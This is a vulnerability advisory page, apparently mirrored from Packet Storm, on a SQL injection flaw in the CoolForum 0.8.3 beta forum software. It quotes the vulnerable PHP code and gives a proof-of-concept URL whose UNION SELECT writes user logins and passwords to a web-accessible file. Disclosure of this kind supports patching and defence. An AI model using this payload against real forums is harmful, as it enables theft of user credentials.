Lucene search

K

coolforum083.txt

🗓️ 05 Jun 2006 00:00:00Reported by DarkFigType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Critical SQL Injection vulnerability in CoolForum 0.8.3 allows unauthorized data access.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Type: SQL Injection  
Risk: Critical  
Product: CoolForum <= 0.8.3 beta  
********************************  
  
  
Vulnerability  
*************  
// File: editpost.php  
// Line 38  
//  
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);  
else $post = 0;  
--  
// Line 77  
//  
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);  
--  
// File: admin/functions.php  
// Line 623  
//  
function getrightedit($idpost,$forumid)  
{  
global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;  
$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost);  
$j = mysql_fetch_array($query);  
--  
  
  
Proof Of Concept  
****************  
http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1  
  
  
Credits  
*******  
Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt  
Note: Others SQL Injection exists but they are difficult to exploit  
by DarkFig  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report